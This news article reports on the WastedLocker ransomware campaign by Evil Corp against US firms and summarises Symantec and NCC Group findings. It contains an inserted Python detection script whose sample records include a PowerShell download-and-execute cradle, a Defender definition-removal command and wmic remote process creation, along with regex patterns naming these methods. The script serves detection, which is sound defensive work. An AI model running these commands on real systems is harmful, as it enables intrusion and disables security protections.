More than two-dozen US organizations — several of them Fortune 500 companies — were attacked in recent days by a known threat group looking to deploy a dangerous new strain of ransomware called WastedLocker.
Had the attacks succeeded, they could have resulted in millions of dollars in damages to the organizations and potentially had a major impact on supply chains in the US, Symantec said in a report Thursday.
According to the security vendor, at least 31 of its customers were targeted, suggesting the actual scope of the attacks is much higher. Eleven of the companies are publicly listed, and eight are in the Fortune 500.
Among those affected were five organizations in the manufacturing sector, four IT companies, and three media and telecommunications firms. Organizations in multiple other sectors — including energy, transportation, financial services, and healthcare — were also affected. In each instance, the attackers managed to breach the networks of the targeted organizations and were preparing to deploy the ransomware when they were detected and stopped.
"The attackers behind this threat appear to be skilled and experienced, capable of penetrating some of the most well protected corporations, stealing credentials, and moving with ease across their networks," Symantec warned. "As such, WastedLocker is a highly dangerous piece of ransomware."
Symantec described the attacks as being carried out by Evil Corp., a Russian cybercrime group that has previously been associated with the Dridex banking Trojan and the BitPaymer ransomware family. Last December, US authorities indicted two members associated with the group — Maksim Yakubets and Igor Turashev — in connection with their operation of the Dridex and Zeus banking Trojans.
The two — along with other conspirators — are alleged to have attempted theft of a staggering $220 million and caused $70 million in actual damages. The US Department of State's Transnational Organized Crime (TOC) Rewards Program has established an unprecedented $5 million bounty for information on Yakubets. Both men remain at large.
The NCC Group, which also published a report on the WastedLocker campaign this week, said its investigations showed the ransomware has been in use since at least May and was likely in development for several months before that. Evil Corp. has typically targeted file servers, database services, virtual machines, and cloud environments in its ransomware campaigns. It has also shown a tendency to disrupt or disable backup systems and related infrastructure where possible, making recovery even harder for victims, NCC Group said.
The malware masquerades as a browser update and lays the groundwork for the computer to be profiled. The attackers have then been using PowerShell to download and execute a loader for Cobalt Strike Beacon, a penetration-testing tool that attackers often use in malicious campaigns.
The tool is being used to execute commands, inject malicious code into processes or impersonate them, download files, and carry out various other tasks that allow the attackers to escalate privileges and gain control of the infected system. As with many current malicious campaigns, the attackers behind WastedLocker have been leveraging legitimate processes and functions, including PowerShell scripts and the Windows Management Instrumentation Command Line Utility (wmic.exe), in their campaign, Symantec said.
To deploy the ransomware itself, the attackers have been using the Windows Sysinternals tool PsExec to launch a legitimate command-line tool for managing Windows Defender (mpcmdrun.exe). This disables scanning of all downloaded files and attachments and disables real-time monitoring, Symantec said. "It is possible that the attackers use more than one technique to perform this task, since NCC reported suspected use of a tool called SecTool checker for this purpose," Symantec said.
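As an added defender-side illustration (not code from Symantec's or NCC Group's reports), the following Python checks constructed process-creation records for the behaviours described above: mpcmdrun.exe launched under PsExec, PowerShell download cradles, and wmic remote process creation. The parent-process name PSEXESVC.exe and the mpcmdrun.exe -RemoveDefinitions switch are assumptions about how such activity would appear in telemetry, not details taken from the article.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    """One process-creation record: host, parent image, image, command line."""
    host: str
    parent: str
    image: str
    cmdline: str

# Detection rules as (name, predicate). PSEXESVC.exe is PsExec's service-side
# process and -RemoveDefinitions is a documented mpcmdrun.exe switch; relying on
# them here is an assumption about how the described activity looks, not a page fact.
RULES = [
    ("defender_cli_via_psexec",
     lambda e: e.image.lower() == "mpcmdrun.exe" and e.parent.lower() == "psexesvc.exe"),
    ("defender_definitions_removed",
     lambda e: e.image.lower() == "mpcmdrun.exe" and "-removedefinitions" in e.cmdline.lower()),
    ("powershell_download_cradle",
     lambda e: e.image.lower() == "powershell.exe"
     and re.search(r"downloadstring|downloadfile|net\.webclient|invoke-webrequest", e.cmdline, re.I)),
    ("wmic_remote_process_create",
     lambda e: e.image.lower() == "wmic.exe" and re.search(r"process\s+call\s+create", e.cmdline, re.I)),
]

def detect(events):
    """Return (host, rule name, command line) for every event that trips a rule."""
    findings = []
    for e in events:
        for name, pred in RULES:
            if pred(e):
                findings.append((e.host, name, e.cmdline))
    return findings

# Constructed sample telemetry (not real data): two benign events plus the chain
# described in the article. A routine signature update must NOT be flagged.
SAMPLE_EVENTS = [
    ProcEvent("FS01", "services.exe", "PSEXESVC.exe", "PSEXESVC.exe"),
    ProcEvent("FS01", "PSEXESVC.exe", "mpcmdrun.exe", "mpcmdrun.exe -RemoveDefinitions -All"),
    ProcEvent("WS22", "explorer.exe", "powershell.exe",
              "powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/u')"),
    ProcEvent("WS22", "cmd.exe", "wmic.exe", "wmic /node:FS01 process call create cmd.exe"),
    ProcEvent("WS22", "explorer.exe", "powershell.exe", "powershell Get-ChildItem C:\\Users"),
    ProcEvent("FS01", "services.exe", "mpcmdrun.exe", "mpcmdrun.exe -SignatureUpdate"),
]

if __name__ == "__main__":
    for host, rule, cmd in detect(SAMPLE_EVENTS):
        print(f"{host}: {rule}: {cmd}")
```

Run against the sample, the Defender tampering event trips two rules while the signature update and the benign PowerShell command produce no findings.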
The ransomware deploys after Windows Defender and all associated services have been stopped across the organization, the vendor noted. "A successful attack could cripple the victim's network, leading to significant disruption to their operations and a costly clean-up operation," Symantec warned.